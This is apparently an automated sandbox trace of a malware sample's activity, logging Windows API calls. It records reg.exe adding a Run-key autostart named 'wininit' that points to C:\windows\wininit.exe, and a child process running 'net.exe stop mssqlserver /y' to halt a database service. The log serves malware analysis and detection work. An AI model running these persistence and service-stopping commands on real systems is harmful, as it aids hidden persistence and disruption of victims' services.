[0138.058] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0138.058] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0138.059] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0138.059] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0138.059] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0138.059] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0138.059] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0138.059] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0138.059] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0138.059] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0138.059] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0138.059] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0138.059] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0138.059] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0138.059] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0138.059] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0138.059] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0138.059] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0138.059] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0138.059] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0138.059] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0138.059] StrChrIW (lpStart="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" [0138.068] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0138.068] GetProcessHeap () returned 0x410000 [0138.068] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x28) returned 0x418890 [0138.068] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0138.068] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 3 [0138.068] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCR", cchCount2=-1) returned 3 [0138.069] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CLASSES_ROOT", cchCount2=-1) returned 3 [0138.069] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCC", cchCount2=-1) returned 3 [0138.069] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_CONFIG", cchCount2=-1) returned 3 [0138.069] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKLM", cchCount2=-1) returned 2 [0138.069] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0138.069] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0138.069] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0138.069] StrChrIW (lpStart="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\Microsoft\\Windows\\CurrentVersion\\Run" [0138.069] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0138.069] StrChrIW (lpStart="Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\Windows\\CurrentVersion\\Run" [0138.069] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0138.069] StrChrIW (lpStart="Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\CurrentVersion\\Run" [0138.069] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0138.069] StrChrIW (lpStart="CurrentVersion\\Run", wMatch=0x5c) returned="\\Run" [0138.069] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0138.069] StrChrIW (lpStart="Run", wMatch=0x5c) returned 0x0 [0138.069] RtlRestoreLastWin32Error () returned 0x238000 [0138.070] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0138.070] RtlRestoreLastWin32Error () returned 0x238000 [0138.070] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0138.070] GetProcessHeap () returned 0x410000 [0138.070] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x5c) returned 0x4149c0 [0138.070] GetProcessHeap () returned 0x410000 [0138.070] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x88) returned 0x414a30 [0138.070] GetProcessHeap () returned 0x410000 [0138.070] GetProcessHeap () returned 0x410000 [0138.070] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x418890) returned 1 [0138.070] GetProcessHeap () returned 0x410000 [0138.070] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x418890) returned 0x28 [0138.070] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x418890) returned 1 [0138.070] GetProcessHeap () returned 0x410000 [0138.071] GetProcessHeap () returned 0x410000 [0138.071] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x413860) returned 1 [0138.071] GetProcessHeap () returned 0x410000 [0138.071] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x413860) returned 0x66 [0138.071] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x413860) returned 1 [0138.071] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/V", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0138.071] lstrlenW (lpString="wininit") returned 7 [0138.071] GetProcessHeap () returned 0x410000 [0138.071] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x10) returned 0x413f20 [0138.071] lstrlenW (lpString="wininit") returned 7 [0138.071] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0138.071] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0138.071] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0138.071] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0138.071] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0138.071] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0138.071] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0138.071] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0138.071] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0138.071] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0138.071] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0138.071] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0138.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 2 [0138.072] StrDupW (lpSrch="REG_SZ") returned="REG_SZ" [0138.072] lstrlenW (lpString="REG_SZ") returned 6 [0138.072] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0138.072] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0138.072] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0138.072] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0138.072] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0138.072] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0138.072] StrChrW (lpStart=" \x09", wMatch=0x5a) returned 0x0 [0138.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_SZ", cchCount1=-1, lpString2="REG_SZ", cchCount2=-1) returned 2 [0138.072] LocalFree (hMem=0x413f40) returned 0x0 [0138.072] RtlRestoreLastWin32Error () returned 0x238000 [0138.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/F", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0138.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/F", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0138.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/F", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0138.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/F", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0138.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/F", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0138.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/F", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0138.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/F", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0138.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/F", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0138.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/F", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0138.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/F", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0138.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/F", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0138.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/D", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0138.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/D", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0138.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/D", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0138.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/D", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0138.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/D", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0138.072] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/D", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0138.073] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/D", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0138.073] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/D", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0138.073] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/D", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0138.073] lstrlenW (lpString="C:\\windows\\wininit.exe") returned 22 [0138.073] GetProcessHeap () returned 0x410000 [0138.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x2e) returned 0x413860 [0138.073] RtlRestoreLastWin32Error () returned 0x238000 [0138.073] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0xcfdd0, lpdwDisposition=0xcfde8 | out: phkResult=0xcfdd0*=0x84, lpdwDisposition=0xcfde8*=0x2) returned 0x0 [0138.073] RegQueryValueExW (in: hKey=0x84, lpValueName="wininit", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x2 [0138.073] lstrlenW (lpString="C:\\windows\\wininit.exe") returned 22 [0138.073] RegSetValueExW (in: hKey=0x84, lpValueName="wininit", Reserved=0x0, dwType=0x1, lpData="C:\\windows\\wininit.exe", cbData=0x2e | out: lpData="C:\\windows\\wininit.exe") returned 0x0 [0138.075] RegCloseKey (hKey=0x84) returned 0x0 [0138.075] GetProcessHeap () returned 0x410000 [0138.075] GetProcessHeap () returned 0x410000 [0138.075] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x4149c0) returned 1 [0138.075] GetProcessHeap () returned 0x410000 [0138.075] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4149c0) returned 0x5c [0138.075] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x4149c0) returned 1 [0138.075] GetProcessHeap () returned 0x410000 [0138.075] GetProcessHeap () returned 0x410000 [0138.075] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x414a30) returned 1 [0138.075] GetProcessHeap () returned 0x410000 [0138.076] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x414a30) returned 0x88 [0138.076] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x414a30) returned 1 [0138.076] GetProcessHeap () returned 0x410000 [0138.076] GetProcessHeap () returned 0x410000 [0138.076] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x413f20) returned 1 [0138.076] GetProcessHeap () returned 0x410000 [0138.076] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x413f20) returned 0x10 [0138.076] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x413f20) returned 1 [0138.076] GetProcessHeap () returned 0x410000 [0138.076] GetProcessHeap () returned 0x410000 [0138.076] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x413860) returned 1 [0138.076] GetProcessHeap () returned 0x410000 [0138.076] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x413860) returned 0x2e [0138.076] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x413860) returned 1 [0138.076] RtlRestoreLastWin32Error () returned 0x238000 [0138.076] GetLastError () returned 0x0 [0138.076] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0xcfd50, nSize=0x0, Arguments=0x0 | out: lpBuffer="䧀A") returned 0x27 [0138.082] GetLastError () returned 0x0 [0138.082] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0138.082] GetProcessHeap () returned 0x410000 [0138.082] GetProcessHeap () returned 0x410000 [0138.082] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x4147b0) returned 1 [0138.082] GetProcessHeap () returned 0x410000 [0138.082] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4147b0) returned 0x2 [0138.082] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x4147b0) returned 1 [0138.082] GetProcessHeap () returned 0x410000 [0138.083] RtlAllocateHeap (HeapHandle=0x410000, Flags=0xc, Size=0x50) returned 0x414a20 [0138.083] RtlRestoreLastWin32Error () returned 0x238000 [0138.083] LocalFree (hMem=0x4149c0) returned 0x0 [0138.083] __iob_func () returned 0x7ff87fe6e210 [0138.083] _fileno (_File=0x7ff87fe6e240) returned 1 [0138.083] _errno () returned 0x760840 [0138.083] _get_osfhandle (_FileHandle=1) returned 0x24 [0138.083] _errno () returned 0x760840 [0138.083] GetFileType (hFile=0x24) returned 0x2 [0138.083] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0138.084] GetFileType (hFile=0x24) returned 0x2 [0138.084] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xcfcd0 | out: lpMode=0xcfcd0) returned 1 [0138.495] __iob_func () returned 0x7ff87fe6e210 [0138.495] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0138.495] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0138.496] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x414a20*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0xcfd40, lpReserved=0x0 | out: lpBuffer=0x414a20*, lpNumberOfCharsWritten=0xcfd40*=0x27) returned 1 [0138.703] GetProcessHeap () returned 0x410000 [0138.703] GetProcessHeap () returned 0x410000 [0138.703] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x413ea0) returned 1 [0138.703] GetProcessHeap () returned 0x410000 [0138.703] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x413ea0) returned 0x6c [0138.704] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x413ea0) returned 1 [0138.704] GetProcessHeap () returned 0x410000 [0138.704] GetProcessHeap () returned 0x410000 [0138.704] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x413e80) returned 1 [0138.704] GetProcessHeap () returned 0x410000 [0138.704] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x413e80) returned 0x18 [0138.704] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x413e80) returned 1 [0138.704] GetProcessHeap () returned 0x410000 [0138.704] GetProcessHeap () returned 0x410000 [0138.704] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x418a70) returned 1 [0138.704] GetProcessHeap () returned 0x410000 [0138.704] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x418a70) returned 0x20 [0138.704] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x418a70) returned 1 [0138.704] GetProcessHeap () returned 0x410000 [0138.704] GetProcessHeap () returned 0x410000 [0138.704] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x418b30) returned 1 [0138.705] GetProcessHeap () returned 0x410000 [0138.705] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x418b30) returned 0x1e [0138.705] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x418b30) returned 1 [0138.705] GetProcessHeap () returned 0x410000 [0138.705] GetProcessHeap () returned 0x410000 [0138.705] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x414080) returned 1 [0138.705] GetProcessHeap () returned 0x410000 [0138.705] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x414080) returned 0x18 [0138.705] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x414080) returned 1 [0138.705] GetProcessHeap () returned 0x410000 [0138.705] GetProcessHeap () returned 0x410000 [0138.705] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x418a40) returned 1 [0138.705] GetProcessHeap () returned 0x410000 [0138.705] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x418a40) returned 0x20 [0138.705] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x418a40) returned 1 [0138.705] GetProcessHeap () returned 0x410000 [0138.705] GetProcessHeap () returned 0x410000 [0138.705] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x414a20) returned 1 [0138.705] GetProcessHeap () returned 0x410000 [0138.705] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x414a20) returned 0x50 [0138.705] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x414a20) returned 1 [0138.706] GetProcessHeap () returned 0x410000 [0138.706] GetProcessHeap () returned 0x410000 [0138.706] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x414270) returned 1 [0138.706] GetProcessHeap () returned 0x410000 [0138.706] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x414270) returned 0x20 [0138.706] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x414270) returned 1 [0138.706] GetProcessHeap () returned 0x410000 [0138.706] GetProcessHeap () returned 0x410000 [0138.706] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x4142a0) returned 1 [0138.706] GetProcessHeap () returned 0x410000 [0138.706] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4142a0) returned 0x20 [0138.706] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x4142a0) returned 1 [0138.706] GetProcessHeap () returned 0x410000 [0138.706] GetProcessHeap () returned 0x410000 [0138.706] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x4142d0) returned 1 [0138.706] GetProcessHeap () returned 0x410000 [0138.706] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4142d0) returned 0x20 [0138.706] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x4142d0) returned 1 [0138.706] GetProcessHeap () returned 0x410000 [0138.707] GetProcessHeap () returned 0x410000 [0138.707] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x418920) returned 1 [0138.707] GetProcessHeap () returned 0x410000 [0138.707] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x418920) returned 0x20 [0138.707] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x418920) returned 1 [0138.707] GetProcessHeap () returned 0x410000 [0138.707] GetProcessHeap () returned 0x410000 [0138.707] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x4147d0) returned 1 [0138.707] GetProcessHeap () returned 0x410000 [0138.707] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4147d0) returned 0x18 [0138.707] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x4147d0) returned 1 [0138.707] GetProcessHeap () returned 0x410000 [0138.707] GetProcessHeap () returned 0x410000 [0138.707] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x418800) returned 1 [0138.707] GetProcessHeap () returned 0x410000 [0138.707] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x418800) returned 0x20 [0138.707] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x418800) returned 1 [0138.707] GetProcessHeap () returned 0x410000 [0138.707] GetProcessHeap () returned 0x410000 [0138.707] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x4189e0) returned 1 [0138.707] GetProcessHeap () returned 0x410000 [0138.707] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4189e0) returned 0x20 [0138.708] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x4189e0) returned 1 [0138.708] GetProcessHeap () returned 0x410000 [0138.708] GetProcessHeap () returned 0x410000 [0138.708] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x418830) returned 1 [0138.708] GetProcessHeap () returned 0x410000 [0138.708] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x418830) returned 0x20 [0138.708] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x418830) returned 1 [0138.708] GetProcessHeap () returned 0x410000 [0138.708] GetProcessHeap () returned 0x410000 [0138.708] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x418980) returned 1 [0138.708] GetProcessHeap () returned 0x410000 [0138.708] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x418980) returned 0x20 [0138.708] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x418980) returned 1 [0138.708] GetProcessHeap () returned 0x410000 [0138.708] GetProcessHeap () returned 0x410000 [0138.708] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x414300) returned 1 [0138.708] GetProcessHeap () returned 0x410000 [0138.708] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x414300) returned 0x18 [0138.708] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x414300) returned 1 [0138.708] GetProcessHeap () returned 0x410000 [0138.709] GetProcessHeap () returned 0x410000 [0138.709] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x418a10) returned 1 [0138.709] GetProcessHeap () returned 0x410000 [0138.709] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x418a10) returned 0x20 [0138.709] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x418a10) returned 1 [0138.709] GetProcessHeap () returned 0x410000 [0138.709] GetProcessHeap () returned 0x410000 [0138.709] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x418aa0) returned 1 [0138.709] GetProcessHeap () returned 0x410000 [0138.709] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x418aa0) returned 0x20 [0138.709] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x418aa0) returned 1 [0138.709] GetProcessHeap () returned 0x410000 [0138.709] GetProcessHeap () returned 0x410000 [0138.709] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x412050) returned 1 [0138.709] GetProcessHeap () returned 0x410000 [0138.709] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x412050) returned 0x18 [0138.709] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x412050) returned 1 [0138.709] GetProcessHeap () returned 0x410000 [0138.709] GetProcessHeap () returned 0x410000 [0138.709] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x418ad0) returned 1 [0138.709] GetProcessHeap () returned 0x410000 [0138.709] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x418ad0) returned 0x20 [0138.710] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x418ad0) returned 1 [0138.710] GetProcessHeap () returned 0x410000 [0138.710] GetProcessHeap () returned 0x410000 [0138.710] HeapValidate (hHeap=0x410000, dwFlags=0x0, lpMem=0x414790) returned 1 [0138.710] GetProcessHeap () returned 0x410000 [0138.710] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x414790) returned 0x18 [0138.710] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x414790) returned 1 [0138.710] exit (_Code=0) Thread: id = 55 os_tid = 0x10d0 Process: id = "12" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x4932b000" os_pid = "0x62c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe44" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop mssqlserver /y" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 804 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 805 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 806 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 807 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 808 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 809 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 810 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 811 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 812 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 813 start_va = 0x7df5ffff0000 end_va = 